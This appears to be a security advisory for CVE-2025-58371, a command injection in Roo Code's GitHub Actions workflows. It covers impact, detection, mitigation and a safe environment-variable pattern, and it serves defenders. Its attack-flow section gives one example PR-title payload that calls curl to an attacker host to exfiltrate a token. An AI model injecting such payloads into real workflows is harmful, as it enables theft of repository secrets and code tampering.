CVE-2025-58371 Overview
CVE-2025-58371 is a critical Command Injection vulnerability affecting Roo Code, an AI-powered autonomous coding agent that integrates into users' editors. The vulnerability exists in GitHub workflow configurations where unsanitized pull request metadata is used in a privileged context, enabling attackers to craft malicious input and achieve Remote Code Execution (RCE) on GitHub Actions runners.
Critical Impact
This vulnerability allows complete repository compromise through arbitrary command execution on GitHub Actions runners, including access to repository secrets, ability to modify code, and creation of malicious releases or packages.
Affected Products
- Roo Code versions 3.26.6 and below
- Roocode Roo Code (all platforms)
Discovery Timeline
- September 5, 2025 - CVE-2025-58371 published to NVD
- September 15, 2025 - Last updated in NVD database
Technical Details for CVE-2025-58371
Vulnerability Analysis
This vulnerability is classified as CWE-78 (OS Command Injection), representing a severe flaw in how Roo Code's GitHub workflow processes pull request metadata. The workflow runs with elevated permissions and has access to repository secrets, making it a high-value target for attackers.
The core issue lies in the improper sanitization of user-controlled input from pull request metadata before it is passed to shell commands within the GitHub Actions workflow. When a malicious actor submits a pull request with specially crafted metadata (such as a manipulated PR title, branch name, or commit message), the workflow processes this input without proper escaping or validation.
Since the vulnerable workflow operates in a privileged context with broad permissions, successful exploitation grants attackers the ability to execute arbitrary commands with the same privileges as the Actions runner. This network-accessible attack requires no authentication or user interaction, making it particularly dangerous.
Root Cause
The root cause is the use of unsanitized pull request metadata directly within shell command contexts in GitHub Actions workflows. GitHub workflows that interpolate user-controlled variables (such as ${{ github.event.pull_request.title }} or ${{ github.event.pull_request.head.ref }}) directly into run: steps without proper sanitization are vulnerable to command injection attacks.
Attack Vector
The attack is network-based and can be initiated by any user with the ability to create a pull request against the target repository. An attacker crafts a malicious pull request containing shell metacharacters or command sequences in the PR metadata fields. When the workflow triggers on the pull request event, it executes the attacker's injected commands.
The attack flow involves:
- Attacker identifies the vulnerable workflow configuration in the target repository
- Attacker creates a pull request with malicious payload embedded in metadata (e.g., PR title containing ; curl attacker.com/exfil?secret=$(cat $GITHUB_TOKEN) ;)
- The workflow triggers automatically on the PR event
- Unsanitized metadata is interpolated into shell commands
- Attacker's payload executes with workflow permissions, accessing secrets and repository resources
Detection Methods for CVE-2025-58371
Indicators of Compromise
- Unexpected or suspicious pull requests with unusual characters in titles, branch names, or commit messages
- GitHub Actions workflow logs showing unexpected command execution or network connections
- Unauthorized commits or releases appearing in repository history
- Evidence of secret exfiltration or unexpected API calls using repository tokens
- New or modified GitHub Actions workflows not matching expected configurations
Detection Strategies
- Review GitHub Actions audit logs for anomalous workflow executions triggered by external pull requests
- Implement GitHub repository rulesets to require approval before workflows run on PRs from first-time contributors
- Monitor for workflow runs that make unexpected outbound network connections
- Scan repository workflows for vulnerable patterns using static analysis tools like actionlint
Monitoring Recommendations
- Enable GitHub Advanced Security code scanning to detect vulnerable workflow patterns
- Configure alerts for workflow failures or unusual execution times
- Monitor repository webhook activity for signs of unauthorized automation
- Implement centralized logging for all GitHub Actions workflow executions in your organization
How to Mitigate CVE-2025-58371
Immediate Actions Required
- Upgrade Roo Code to version 3.26.7 or later immediately
- Audit existing GitHub Actions workflows for similar vulnerable patterns involving unsanitized input
- Review recent pull requests and workflow runs for potential exploitation attempts
- Rotate any secrets that may have been exposed through the vulnerable workflow
- Enable required approvals for workflow runs from external contributors
Patch Information
The vulnerability has been fixed in Roo Code version 3.26.7. The security patch is available through the GitHub Commit Update. For detailed information about the vulnerability and remediation, refer to the GitHub Security Advisory GHSA-xr6r-vj48-29f6.
Workarounds
- Configure pull_request_target workflows to require explicit approval before running on external PRs
- Use environment variables with proper escaping instead of direct interpolation in run: steps
- Implement intermediate environment variable assignment to prevent direct injection in shell contexts
- Restrict workflow permissions using the permissions: key to follow the principle of least privilege
- Consider disabling the vulnerable workflow temporarily until the patch can be applied
# Example: Safe workflow configuration pattern
# Instead of: run: echo "${{ github.event.pull_request.title }}"
# Use environment variable assignment:
env:
PR_TITLE: ${{ github.event.pull_request.title }}
run: echo "$PR_TITLE"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
